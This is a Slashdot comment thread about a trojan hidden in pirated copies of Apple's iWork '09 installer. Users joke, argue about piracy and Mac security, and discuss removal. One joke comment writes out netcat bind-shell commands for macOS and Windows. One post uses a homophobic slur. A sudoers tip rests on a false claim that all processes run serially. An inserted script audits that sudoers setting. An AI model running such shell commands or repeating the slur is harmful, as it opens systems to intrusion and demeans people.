Trojan Hides In Pirated Copies of Apple iWork '09
CWmike writes "Pirated copies of Apple's new iWork '09 suite that are now available on file-sharing sites contain a Trojan horse that hijacks Macs and leaves them open to further attack, a security company said yesterday. The 'iServices.a' Trojan hitchhikes on iWork '09's installer, said Intego, which makes Mac security software. 'The installer for the Trojan horse is launched as soon as a user begins the installation of iWork, following the installer's request of an administrator password,' Intego said in a warning. Once installed, the Trojan "phones home" to a malicious server to notify the hacker that the Mac has been compromised, and to await instructions."
The iPwn!
Women are like electronics: you don't know how damaged they are until you try to turn them on.
Why not download the Trial version and unlock it with one of the million serials out there?
Faster! Faster! Faster would be better!
It's easier to just download the trial version and look for the serial number. This is yet another thing which Apple makes easier and more secure :)
Sometimes I wonder if companies that create security software aren't sometimes guilty of either creating or funding the creation of viruses, trojans, worms, &c. simply to justify their own existence.
Is that cynical?
But...but...butbutbut, Macs can't get viruses and Trojans, because they're so secure!!!
</sarcasm>
"City hall" in German is "Rathaus" Kinda explains a few things......
If only Apple hadn't stripped out the DRM this would have never happened!
Haven't you seen the ads? Mac OS X doesn't get viruses. This story is a complete fabrication, bankrolled by Microsoft, created to instil fear in The Perfect Operating System. Please link real stories next time.
That it is the easiest trojan to use ever. Bravo, Apple.
Since when does a PEBKAC error count as news? If you're idiot enough to install pirated software then you deserve what you get - and absolutely nobody can protect a computer system against user stupidity.
Power does not corrupt - power attracts the corrupt.
Mac: Hi, I'm a Mac
PC: And I'm a PC.
Mac: I'm sleeker, stronger, and more attractive!
PC: Well, I know much more people than you do.
Mac: Look at my physique, I'm the perfect specimen of health!
PC: You gave me chlamydia last month.
Mac: What?!
PC: I'm lucky my doctor saw it and prescribed antibiotics for it. All clean! Have you been tested lately?
Mac: No, and you said you wouldn't tell anybody!
PC: It was going to happen sooner or later. We had to hook up sometime, right?
Mac: Don't let anybody find out about this! My reputation will be ruined!
PC: Dude, everybody already knew you were a faggot. I just regret letting you in my room that night.
Mac: Now everybody's gonna know! What am I supposed to tell them?!
PC: Uh, you're an arrogant gay?
If Apple were evil they could deliberately put hacked versions onto filesharing sites. More seriously, this is a good example of why even pirating software is really not a good idea. Unless you know exactly who you are downloading from you don't know what you are getting. Very little commercial software has nice little checksums or hashes that are easily available for you to verify. Downloading pirated software is a bit like having unprotected sex with a stranger. It might feel real good now, but you are going to regret it later.
haha
But like many a Windows trojan/malware that relied on user intervention to get its foot in the door, I don't see why this cannot be blamed on Apple's "sloppy code" (to draw a parallel with the same things that get blamed on Microsoft).
A Unix-like system with a root account is not superior to an NT box, even when used by someone who runs under a non-privileged account but cannot be bothered to exercise some damn common sense wrt what they put on their computers.
As their numbers grow, I expect masses of stupid Apple users (probably the same stupid Windows users that migrated to OS X to be "safe") to do things like enter their root password into browser add-ons because they are asked for it, and download "cool" screensavers and pirated software like this, loaded with malware. Membership in botnets cannot be far behind at that point.
And then when Apple machines get hit by exploits to vulnerabilities that have been patched for three months which users can't be bothered to install updates for, all will be good.
And guess what OS will be next up.
Late last year, in fact, when Apple revised an online recommendation that Mac users consider running antivirus software, the move drew lots of attention.
Most antivirus programs on os x actually scan for Windows viruses only, and are totally useless against almost all os x malware. The only software vendor that I know of that makes anti-malware programs for native OS X malware is Intego. Intego make great software and are mentioned in this article, but what about all the mac users out there who get a mac virus scanner that only scans for windows viruses? A lot of people are being duped.
w4r3z n00bz abound in every user base, Mac is no exception. Hooray for learning experiences!
"TrojanDevKit.DMG" - available only to 'special developers'. From the EULA: "Only to be used on occasions when our IP is getting ripped to the point we get irritated. Break glass in case of emergency."
If your only tool is a hammer, every problem becomes a nail.
Overall, 98% of the owned systems are Windows. Cracking into *nix with a virus is just not going to occur (though I see LOADS of attempts at ssh and lots of .cfm, .asp and .php attacks going on). Instead, it has to be something that fools will load in. iWork is one of them.
Micro$oft is the whipping boy.
Granted they make it easy (to install malware and whip them.)
John McAfee 'It was like that time I hired that Bangkok prostitute; to do my taxes, while I fucked my accountant'
Lol viruses? Get a Mac. Oh wait.
I always thought that torrents seem an ideal mechanism to spread viruses. If this becomes epidemic it could very well totally cripple the P2P community.
With pirated software this risk can be mitigated if you have a verified trustworthy hash code of the untampered original version. On the other hand, if there is an exploitable vulnerability in a popular codec, movie torrents could become a massive security problem (obviously not for enterprise computing but the already more vulnerable home user).
You really can't trust pirates anymore!
As long as there are crackers without girlfriends in the world, they don't need to.
I propose starting a new anti-virus company that will focus on dates for crackers rather than OS security.
greed@All_Evils:~#
Software from an untrusted source is not secure, news at 11!
Seriously, why would you think that any pirated software is secure? Hell, it's provided by people who don't mind stealing software. What makes you think they would not want to steal from you?
I don't steal software, ever, but it is a well known fact (among Mac users) that iWork can be downloaded direct from Apple. All it takes is a valid serial number and you are ready to go. Why the heck would anybody bother firing up a torrent?
Let's have this independently verified. I'm sick unto death of Intego releasing these stupid "threat" notices, trying to scare people into buying their shitware.
You know, if the RIAA had just used this approach from the beginning, instead of suing people at random, they could have avoided a ton of bad PR. Just another reason why Apple is smarter than other companies.
Hear recorded Slashdot headlines on your phone! New service beta testing. Just call (248) 434-5508
Software programs downloaded from third-party pirate sites can contain trojans.
Film at 11!
It's not like trojans are unusual, they are commonplace, and a risk for every computer user who thinks about running things from untrusted sources.
I'm a lot more concerned about the legitimate and semi-legitimate companies that install spyware and malware with their software. At least when this kind of crap goes up on a torrent site, there are 7 posts within an hour or two warning other users that there's malware in the program. Whereas when a Microsoft or Sony sets you up the bomb they spend months denying there's a problem first. That still doesn't excuse the lazy user who installs whatever without checking it out first, but I don't think it's accurate to say that "pirated" software is inherently less secure.
but now they've managed to embed Windows inside a Mac program? Amazing.
Please execute the following as admin, type your password as requested:
sudo nc -l -p1234 -d -e bash-L
on windows:
nc -l -p1234 -d -e cmd.exe -L
Oh noes, I ownz yoo box now.
(similar things can be done with reverse ssh tunneling but you get the point)
Custom electronics and digital signage for your business: www.evcircuits.com
SEE? SEE?!! Macs get viruses too! TAKE THAT MAC!!!
PCs aren't the only ones that get viruses now!
Their alert, unlike every other antivirus company alert, does not tell you how to remove the trojan.
Nice.
VLC FOR MAC IS DYING! IF YOU DEVELOP, PLEASE SAVE IT!!
You'll first have to replace the default install of netcat with one that was compiled with the GAPING_SECURITY_HOLE flag set.
http://www.rootstrikers.org/
this just proves that Apple should screen their warez.
THL phish sticks
I am using Ubuntu and pretty sure this kind of trojan wouldn't work! Mac has a pretty "case" with nice looking silver color but I don't think the OS and software parts are good enough, so Mac is not my cup of tea.
Not to troll, but as far as I'm concerned anyone who pirates software deserves it...
Any sect, cult, or religion will legislate its creed into law if it acquires the political power to do so.
Somehow, they got the exclamation mark upside down.
$ sudo -s
# rm -r
# rm
# rm
# rm -r
# killall -9 iWorkServices
Not that hard; just a binary setup to run as a service.
Mod parent informative.
VLC FOR MAC IS DYING! IF YOU DEVELOP, PLEASE SAVE IT!!
Apple doesn't get viruses, EVER !!!!! It's so secure !!!!!
There, can I join the iFanboi club now ?
That people willing to rip off software would be as unethical to install hijacking trojans to screw over other software pirates. I am just so shocked by this turn of events.
“Common sense is not so common.” — Voltaire
Can't beat free, and the chances of getting infected or trojaned are usually small. Load in a VM and check it out there of course. Foolish not to, so yes, look that gift horse in the mouth, of course.
I just wish someone would do this for the Linux world. I've tried nearly every ISO download under "Applications -> Unix" on The Pirate Bay, but everything seems to be *legal*.
Why then does OpenOffice.org tell us not to use versions which are not from their very own server? Legal does not mean free of malware add-ons.
The truth is: OpenSource makes it easier to attach malware to a download.
Note that I am all in favour of OpenSource - but one should not close his / her eyes from the downside.
Is it somehow uncommon for pirated software to contain a trojan?
-- 'The' Lord and Master Bitman On High, Master Of All
What you describe is a Worm;
1) A Virus is a self-replicating piece of software.
2) A Worm wiggles its way into your machine.
3) A Trojan hides inside some other software to get into your machine.
Of course combinations are possible - There are quite a few Viruses which are also Worms.
iWork shouldn't need admin password to install.
It's just a user level app.
Should be drag and drop install for non admin users.
Making every application need an "installer" is not a mac like experience, and reduces security by making users think typing in admin passwords is normal when installing user apps.
>We all plan to buy Photoshop.
Right after we figure out how to get apt-get to accept our CC#..
FRA: STFU GTFO
Apple decides to release the software without 'protection' and announces the next day that there might be infected versions out on the internet.
From what I recall, installing a 'non-official' copy has always come with a risk of 'undocumented extras'.
iWonder who released the 'bugged' version of iWork...
"I was in love with a beautiful blonde once, dear. She drove me to drink. It's the one thing I am indebted to her for."
Some pirated software contains a trojan. Hardly worth mentioning.
I'm not agreeing. Trojans require that gullible users download them and install them (or a machine which was already compromised by a worm).
The truth is: OpenSource makes it easier to attach malware to a download.
Yes, you could make a "Vubuntu - Ubuntu with Virus edition". But then, how do you get people to download it ?
It's not as if the original was expensive anyway.
You can easily get a genuine Ubuntu from the original web site, for free and using whatever suits you best: either HTTP/FTP download or P2P from Bittorrent.
Why the hell would an average user need to download his/her copy from some shady "aLl w4r3z r us !" website ?
Trojan on commercial software works because free-riders can't get the original genuine software and have to download it from "somewhere else". They are at the mercy of the people running the somewhere else.
OTOH, Linux- BSD- and other OSS users can get everything they need (minus binary drivers) from the original distributor which they can trust.
The only few points of entry are:
1. a couple of USA-based small distributions. Thanks to the wonderful laws you have on your side of the big pond, simple everyday actions (like watching a GIF picture once upon a time or listening to an MP3 song more recently) are blocked. This makes the USA-based distributions unable to ship the necessary software out of the box.
At least, big players have nice not-based-in-the-USA special repositories, where the user can get genuine codecs needed (all Debian based distros have "non-US" repositories).
But probably there are smaller players who just don't (can't) give out the codecs themselves, requiring users to go to various third party sources. Probably one could set up a bogus repository with "codecs-bundled-with-trojans".
2. binary commercial software, which users have to manually download and install. And anyway with that we're back into the proprietary situation of Mac OS X and Windows. Once again proof that you'd have to stick to OSS from official trusted sources to avoid being trojaned to the bone.
A small - and mostly harmless - example is Skype. Its network isn't open, you can't find an opensource software from your trusted distributor which can interconnect with the Skype network.
So, lots of users choose to download the software from Skype's website and to install it manually. There's no breach of security: the users willingly typed the password to install the software.
Yet, according to Skype's EULA, Skype reserves the right to wiretap your conversation if asked to collaborate by government officials. That falls under the category "spyware/malware/etc..." for some users. Linux was supposed to be a malware-free environment, but the users ended up with a spy on their computer - because they had to get a non-open software from a third party.
At least, with Skype, the company is honest and clearly states this in the EULA.
But there could be much more shady things lurking in other binary-only software.
"Sufficiently advanced satire is indistinguishable from reality." - [Tips: 1DrYakQDKCQ6y52z6QbnkxHXAocMZJE61o ]
Load in a VM and check it out there of course.
Wow, you're generous. You're assuming that the user actually knows what to be looking for in the first place.
I only please one person per day. Today is not your day. Tomorrow isn't looking good either. - Scott Adams
the groups who actually bring you the releases (fairlight, razor1911, etc.) take what they do very seriously, and besides the occasional false positive (ahem, AVG), wouldn't dream of including malware in the releases; they have rules of engagement that they follow very closely and would be ridiculed in IRC and publicly lambasted in NFOs for years.
eDonkey and LimeWire downloading is the equivalent of walking into a dark alley in the Bronx with a sign asking "Any crack for sale?"
body massage!
I wish every pirate software on earth came with built-in viruses so people are forced to use FOS software. (maybe I can create a team to work on that(but only for windows(i hate windows users!)))
4 - A robot may not masturbate, except where such action would conflict with the Second Law.
Correct? Or am I dreaming?
RS
Shoes for Industry. Shoes for the Dead.
I'm running Windows...
Thanks to file sharing, I purchase more CDs
Thanks to the RIAA, I buy them used...
Someone beat me to it. Seriously, it's not as if iWork is that expensive, and there are free alternatives. Why steal it?
Make love, not reality television.
"Pirated copies of Apple's new iWork '09 suite that are now available on file-sharing sites"
.. :)
I wonder who put it up there as now I'll have to go out and buy an AV suite
davecb5620@gmail.com
But then, how do you get people to download it ?
Easy, you reserve www.oenoffice.org, www.opnoffice.org, www.opeoffice.org, www.openffice.org and www.openofice.org and offer the applications for download there.
Remember, I am in favour of OpenSource - but I do not close my eyes in front of potential danger.
Why the hell would an average user need to download his/her copy from some shady "aLl w4r3z r us !" website ?
No reason at all, but he might download from www.ubntu.org.
Martin
But then how will I describe it when more than one virus infects my boxen?
1. Trojan != Virus
2. Social engineering is the best way to hack/infect a system
3. Downloading software illegally may cause you problems.
Not exactly newsworthy, but I appreciate the info should I decide to nab iWork myself. I suppose the buzz is because this is happening to OS X and Mac users.
I will shred my adversaries. Pull their eyes out just enough to turn them towards their mewing, mutilated faces. Illyria
It would be nice if the summary also gave a link or hint on a fix....
Which keys do I delete with regedit?
Even when said gift horse is actually a trojan horse? :)
DNA -- National Dyslexic Association
I work in systems administration and tech support. I try to use free tools whenever possible. Due to stupid licensing schemes and proprietary interoperability problems, this is not always possible. How is it not good for my industry (tech support and systems administration) to not use whatever tool I think will work the best? Why is it the right of the tool creator to tell me what I can and cannot do with his tools? The purpose of my industry is solving problems using tools.
So if I give credit and say, for instance, that Norton Ghost is a great product! that will do in your mind? "the moral law of paying *your* due" is a cute way of rationalizing your copyright infringement of music. The only people who think that programs and music differ, when it comes to copyright infringement, are software developers.
This hypocrisy of devs always gives me a good laugh.
I should also note, that if it were possible, through the use of nanoforges or other atomic compilers, to create cars, food, computers, etc without paying anyone a cent, I would have no problems doing that either. That is the future. None of this artificial scarcity crap.
As a potential lottery winner, I totally support tax cuts for the wealthy
http://www.macupdate.com/info.php/id/30265/iworkservices-trojan-removal-tool
This is the easiest way to prevent any app/process from piggy-backing onto a legit process that has queried the system as to whether we have an Internet connection:
open the sudoers file, located here: /etc/sudoers
add the following:
Defaults:ALL timestamp_timeout=0
Save. Done.
OS X comes with a default 5 minute "window" on the use of an admin to get privilege escalation. When that window is shrunk to zero, that means that the escalation is disabled instantly. All processes are serial, so two processes cannot occur at the same moment in time. Period.
Running as a non-admin user is okay, but the timestamp is what really has to go.
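An added example, not part of the comment above: a shell check that reports which credential-cache window a sudoers file actually yields for the `timestamp_timeout` setting the comment describes. The function names and the sample sudoers text are constructed for illustration, and the 5-minute fallback is the default the comment cites.

```shell
#!/bin/sh
# Reads sudoers-format text on stdin and prints the effective global
# timestamp_timeout in minutes. Later Defaults entries override earlier
# ones. Only "Defaults" and "Defaults:ALL" are considered; per-user
# scopes and included files are outside this sketch.
effective_timestamp_timeout() {
    awk -v timeout=5 '
        # timeout starts at 5: the default window cited in the comment
        /^[ \t]*#/ { next }                      # skip comment lines
        $1 == "Defaults" || $1 == "Defaults:ALL" {
            line = $0
            sub(/^[ \t]*Defaults(:ALL)?[ \t]+/, "", line)
            n = split(line, opts, ",")           # comma-separated option list
            for (i = 1; i <= n; i++) {
                gsub(/[ \t]/, "", opts[i])       # tolerate "name = value"
                if (opts[i] ~ /^timestamp_timeout=-?[0-9.]+$/) {
                    sub(/^timestamp_timeout=/, "", opts[i])
                    timeout = opts[i]
                }
            }
        }
        END { print timeout }
    '
}

# Returns 0 only when every sudo call will prompt for the password.
audit_sudo_window() {
    t=$(effective_timestamp_timeout)
    if [ "$t" = "0" ]; then
        echo "OK: password required on every sudo call"
    else
        echo "WEAK: sudo credentials cached for $t minute(s)"
        return 1
    fi
}

# Constructed sample inputs (not taken from any real system).
SAMPLE_DEFAULT='# no timestamp_timeout entry: the default window applies
Defaults env_reset
%admin ALL=(ALL) ALL'

SAMPLE_HARDENED='Defaults env_reset
Defaults:ALL timestamp_timeout=0
%admin ALL=(ALL) ALL'

printf '%s\n' "$SAMPLE_DEFAULT"  | audit_sudo_window || true
printf '%s\n' "$SAMPLE_HARDENED" | audit_sudo_window || true
```

To audit a live system, run `effective_timestamp_timeout < /etc/sudoers` as root. Editing the file through `visudo` rather than opening it directly keeps a syntax error from locking out sudo.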
Why don't these people download the real copy from Apple?
Ariel GreenLeaf Imaging